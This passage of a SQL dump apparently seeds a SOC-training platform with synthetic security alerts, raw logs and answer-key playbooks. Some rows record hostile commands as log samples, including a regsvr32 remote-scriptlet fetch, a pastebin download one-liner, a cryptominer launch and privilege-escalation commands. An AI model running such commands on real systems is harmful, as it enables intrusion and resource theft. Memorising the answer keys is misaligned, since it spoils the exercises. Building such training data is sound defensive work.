activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@0ffice365-security.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Lookalike domain used in phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-verifyoffice365.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing page mimicking Office365 login\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and used a lookalike domain to deceive users into entering their credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (740, 'Fileless Malware Detected via Process Hollowing', 'high', 'CrowdStrike', 'A process hollowing technique was detected on a user endpoint, indicating a potential fileless malware execution. The attack leveraged PowerShell with heavy obfuscation.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"\",\"username\":\"m.smith\",\"hostname\":\"DESKTOP-45KTHR\",\"command_line\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\"}', '2026-01-11 01:56:23', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of process hollowing\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command suggests process hollowing, a common technique for fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (741, 'DGA Domain Detected in Network Traffic', 'medium', 'Firewall', 'Suspicious network traffic was detected involving a domain generated by a Domain Generation Algorithm (DGA), commonly used for C2 communication.', 'Command and Control', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:22:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jane.doe\",\"hostname\":\"LAPTOP-JDOE\",\"domain\":\"gibberish12345.biz\"}', '2026-01-09 20:43:04', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple DGA domains\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gibberish12345.biz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain matches patterns used by DGA malware\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The domain and associated IP are indicative of DGA-based C2 communication.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT'), (742, 'Failed Network Connection Attempt to Known Malicious IP', 'low', 'IDS', 'A network connection attempt was detected to an external IP previously reported for malicious activities. Further investigation revealed it was a benign service misconfiguration.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:47:59Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.99\",\"username\":\"svc.account\",\"hostname\":\"SERV-01\"}', '2026-01-10 08:16:16', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the service account host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for malicious activities but currently clean\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The connection attempt to a previously malicious IP was due to a misconfigured service, resulting in a false positive.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS'), (743, 'Suspicious AWS Lambda Invocation Detected', 'critical', 'AWS GuardDuty', 'A Lambda function was invoked with a payload indicative of crypto mining. The function leveraged multiple legitimate services as C2 channels.', 'Malware', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:23:45Z\",\"event_type\":\"lambda_invocation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.56\",\"username\":\"aws_lambda_user\",\"hostname\":\"lambda-instance-01\",\"command_line\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-01-11 09:40:26', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 237 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known crypto mining malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command uses pastebin to fetch remote scripts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Lambda invocation detected with indicators pointing to crypto mining. IP and hash linked to malicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (744, 'Azure AD Privilege Escalation Attempt', 'high', 'Microsoft Sentinel', 'Anomalous activity detected with Azure AD privileges being elevated using a compromised account. The activity was followed by suspicious PowerShell commands.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"win-server-2026\",\"command_line\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\"}', '2026-01-10 15:01:29', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Privilege escalation detected with encoded PowerShell indicative of malicious intent.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (745, 'Potential Data Exfiltration via Exposed S3 Bucket', 'high', 'AWS CloudTrail', 'Sensitive data was accessed from an exposed S3 bucket by a foreign IP, suggesting data exfiltration.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:40:12Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.0.2.44\",\"username\":\"s3_data_user\",\"hostname\":\"s3-bucket-123\",\"request_body\":\"GET /sensitive-data.csv HTTP/1.1\"}', '2026-01-10 08:53:05', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized data access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.csv HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Access to sensitive data file without authorization\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"review_bucket_permissions\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"IP involved in accessing exposed S3 bucket with sensitive data, indicative of data exfiltration.\"}', 'Expert', 'CLOUD', 9, 1, 'OT_ICS'), (746, 'False Positive: Legitimate User Mistaken for Brute Force Attacker', 'medium', 'Splunk', 'Multiple login failures detected from an internal IP address. Investigation revealed a legitimate user mistyping their password.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:25:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"10.0.1.15\",\"username\":\"jane.doe\",\"hostname\":\"corp-laptop-01\",\"failed_attempts\":12}', '2026-01-09 22:57:28', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, no external threat detected\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate corporate user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login failures occurred due to user error; no malicious activity detected.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (747, 'Lateral Movement Detected Using LOLBins within Azure Environment', 'critical', 'Azure Sentinel', 'Suspicious regsvr32.exe execution detected on multiple internal hosts indicating potential lateral movement using LOLBins within Azure VMs.', 'Lateral Movement', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"jdoe\",\"hostname\":\"AzureVM01\",\"command_line\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\"}', '2026-01-09 22:34:33', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used for executing remote script leveraging regsvr32\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of regsvr32 to execute a remote script is indicative of an attempt to move laterally within the network.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (748, 'Exposed S3 Bucket Detected, Potential Data Exposure', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, which could lead to unauthorized data exposure.', 'Data Exfiltration', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"AWS\",\"username\":\"aws-user\",\"hostname\":\"N/A\",\"request_body\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\"}', '2026-01-11 12:33:53', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP previously reported for suspicious cloud activity\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"malicious\",\"details\":\"Bucket policy allows public access to all objects\"}}],\"expected_actions\":[\"block_ip\",\"close_bucket_policy\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public access to S3 buckets can expose sensitive data. Immediate action required to close access.\"}', 'Advanced', 'DLP', 7, 1, 'OT_ICS'), (749, 'Encoded PowerShell Command Execution Detected in GCP', 'critical', 'Google Cloud Security Command Center', 'An encoded PowerShell command was executed on a Google Cloud VM, indicative of possible malicious activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"GCP-VM-01\",\"command_line\":\"powershell -enc aGVsbG8gd29ybGQ=\"}', '2026-01-10 13:25:27', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the GCP VM\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are often used to evade detection and execute malicious payloads.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (750, 'Suspicious Email Detected - Potential False Positive', 'medium', 'Proofpoint Email Gateway', 'An email containing a link to an external website was flagged as suspicious but appears to be from a trusted source.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:25:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.20\",\"username\":\"employee@example.com\",\"hostname\":\"N/A\",\"email_sender\":\"trusted.source@example.com\",\"request_body\":\"Please review the attached document: https://example-trusted-site.com/document\"}', '2026-01-10 11:44:36', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted email provider\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://example-trusted-site.com/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL belongs to a trusted and verified domain\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted.source@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"clean\",\"details\":\"Email address registered to a known and trusted organization\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Despite initial suspicion, the email was verified to be from a trusted source with clean OSINT results.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT'), (751, 'Potential Crypto Mining Activity on AWS EC2 Instance', 'high', 'AWS GuardDuty', 'GuardDuty detected anomalous CPU usage patterns consistent with crypto mining on an EC2 instance. This activity is often indicative of unauthorized resource usage.', 'Malware', 'T1496', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:23:45Z\",\"event_type\":\"anomalous_usage\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.78\",\"username\":\"ec2-user\",\"hostname\":\"ec2-192-168-1-10.compute-1.amazonaws.com\",\"command_line\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\"}', '2026-01-10 12:48:36', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to AWS EC2 instance\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 547 times for crypto mining activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known command line for crypto mining operations\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known crypto mining command indicates unauthorized resource usage.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'), (752, 'Suspicious IAM Privilege Escalation in Azure', 'critical', 'Azure Sentinel', 'A user account was detected attempting to assign itself higher privileges through an unusual method. This could indicate a compromised account.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"52.233.123.45\",\"username\":\"john.doe\",\"hostname\":\"azure-vm-01\",\"command_line\":\"az role assignment create --assignee john.doe --role Owner\"}', '2026-01-10 17:50:25', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Azure VM\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"52.233.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee john.doe --role Owner\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for unauthorized privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command line used is indicative of unauthorized privilege escalation.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (753, 'Exposed S3 Bucket Detected in AWS', 'medium', 'AWS CloudTrail', 'A public read/write permission was detected on an S3 bucket, potentially exposing sensitive data.', 'Data Exfiltration', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:42:05Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"13.54.32.123\",\"username\":\"admin\",\"hostname\":\"cloud.aws.local\",\"request_body\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\"}', '2026-01-09 16:19:33', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of AWS management console\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Exposing S3 bucket with public read/write permissions\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public read/write permissions on a sensitive S3 bucket are a security risk.\"}', 'Intermediate', 'CLOUD', 5, 1, 'OT_ICS'), (754, 'False Positive: Unusual Login Attempt Detected', 'low', 'Splunk', 'A login attempt from a new location was detected for user \'alice.smith\', but further investigation revealed this was a legitimate business trip.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.101\",\"dst_ip\":\"203.0.113.10\",\"username\":\"alice.smith\",\"hostname\":\"vpn.company.com\",\"failed_attempts\":\"3\"}', '2026-01-10 10:38:35', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not reported for malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"alice.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"clean\",\"details\":\"User confirmed to be on a business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The user\'s travel itinerary confirms this was a legitimate login attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (755, 'Exposed AWS S3 Bucket Detected', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, potentially exposing sensitive data. Immediate action is required to secure data.', 'Data Exfiltration', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"bucket_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"user123\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"\",\"bucket_name\":\"sensitive-data-bucket\",\"access_policy\":\"public-read\"}', '2026-01-10 02:30:01', '2026-01-11 15:13:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 142 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"bucket_name\",\"value\":\"sensitive-data-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"internal\",\"details\":\"Exposed bucket found on AWS\"}}],\"expected_actions\":[\"block_ip\",\"secure_bucket\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The public access policy on the S3 bucket is a clear indicator of misconfiguration leading to potential data exposure.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS'), (756, 'Unauthorized IAM Privilege Escalation Attempt', 'critical', 'AWS CloudTrail', 'An IAM user attempted to escalate privileges without authorization, indicating potential account compromise.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"iam_policy_change\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"\",\"username\":\"compromised_user\",\"hostname\":\"iam.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\",\"policy_name\":\"AdminAccess\"}', '2026-01-11 09:24:16', '2026-01-11 15:13:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 560 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IAM user account detected with unauthorized privilege escalation attempt\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"audit_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command to escalate IAM privileges combined with the source IP\'s reputation indicates a compromise attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE'), (757, 'Suspicious Lambda Function Execution', 'medium', 'AWS Security Hub', 'A Lambda function executed with unexpected parameters, indicating potential misuse for crypto mining activities.', 'Resource Hijacking', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"lambda_execution\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"lambda.amazonaws.com\",\"request_body\":\"function: crypto_mine\",\"command_line\":\"\"}', '2026-01-10 07:51:32', '2026-01-11 15:13:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP previously associated with crypto mining pools\"}},{\"id\":\"artifact_2\",\"type\":\"request_body\",\"value\":\"function: crypto_mine\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Unexpected function parameter for crypto mining detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"disable_function\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"resource_hijacking\",\"analysis_notes\":\"The execution of a Lambda function for crypto mining suggests resource hijacking, especially given the IP’s history.\"}', 'Beginner', 'EDR', 3, 1, 'FINANCE'); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (758, 'False Positive: Unusual Login Attempt from Known Safe VPN', 'low', 'Azure Sentinel', 'A login attempt from a foreign IP was flagged as suspicious, but investigation reveals it is a known safe VPN used by the employee.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"\",\"username\":\"employee_vpn_user\",\"hostname\":\"login.microsoftonline.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":3}', '2026-01-10 04:12:19', '2026-01-11 15:13:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPQualityScore\",\"verdict\":\"clean\",\"details\":\"IP belongs to a known safe VPN provider used by the 